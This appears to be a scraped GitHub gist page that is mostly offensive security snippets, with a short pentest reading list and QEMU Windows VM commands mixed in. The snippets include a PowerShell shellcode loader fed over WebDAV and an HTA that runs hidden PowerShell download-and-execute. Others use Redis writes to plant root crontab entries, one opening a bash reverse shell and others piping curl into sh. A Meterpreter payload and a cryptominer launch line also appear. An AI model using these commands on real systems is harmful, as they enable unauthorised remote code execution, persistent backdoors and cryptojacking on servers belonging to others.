View Invoke-WebDavDelivery.ps1
function Invoke-WebDavDelivery
Receive a shellcode over WebDav PROPFIND channel, then load it into memory and execute it.
This script requires its server side counterpart ( to communicate with and actually deliver the payload data.
Function: Invoke-WebDavDelivery
Author: Arno0x0x, Twitter: @Arno0x0x
View gist:606c41ac6ec40bf5c69d4db96d9312e3
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
# Installing
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 2048 -cdrom ~/Downloads/Win10_English_x64.iso -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -drive file=~/Downloads/virtio-win-0.1.105.iso,index=1,media=cdrom
# Running
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 4096 -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -usbdevice tablet -rtc base=utc
View DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
View gist:93a9a8fa20acd0d62d0343b438710db8 cat hta-psh.txt
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('')"</scRipt>
# cat hta-psh.txt |redis-cli -x -h set a
use payload/windows/meterpreter/reverse_tcp
generate -t hta-psh -f /var/www/1.ps1
#cat 1.ps1
View gist:b5e8ae7a489207c58f54cfaa7b37718d
echo " " > /tmp/zz
cat /tmp/w >> /tmp/zz
/bin/sh /tmp/zz
redis-cli get r
* * * * * sleep 10;/bin/sh /tmp/zz
View gist:5a9578a66484435b9685e03a27c9d3fc
redis-cli flushall
redis-cli set 2 ';a=`redis-cli get c`;'
redis-cli set 1 'id;redis-cli set r `$a`;#'
redis-cli config set dir /tmp/
redis-cli config set dbfilename w
redis-cli save
redis-cli set c whoami
View gist:01963c7a36235e90c11ef8756e76d3d5
redis-cli flushall # 为了方便测试
redis-cli set test 'test'
redis-cli set my 'mymymymymymymymymymymymy'
redis-cli set word 'wordwordwordwordwordword'
redis-cli set hello 'ringzero'
redis-cli set word1 'word1word1word1word1word1word1'
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
View gist:df7082a56f1d7bc9681ceb3fea65c0fe
redis-cli flushall
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/ 0>&1\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/15 * * * * curl -fsSL | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL | sh" > /var/spool/cron/crontabs/root
# ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp:// &
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then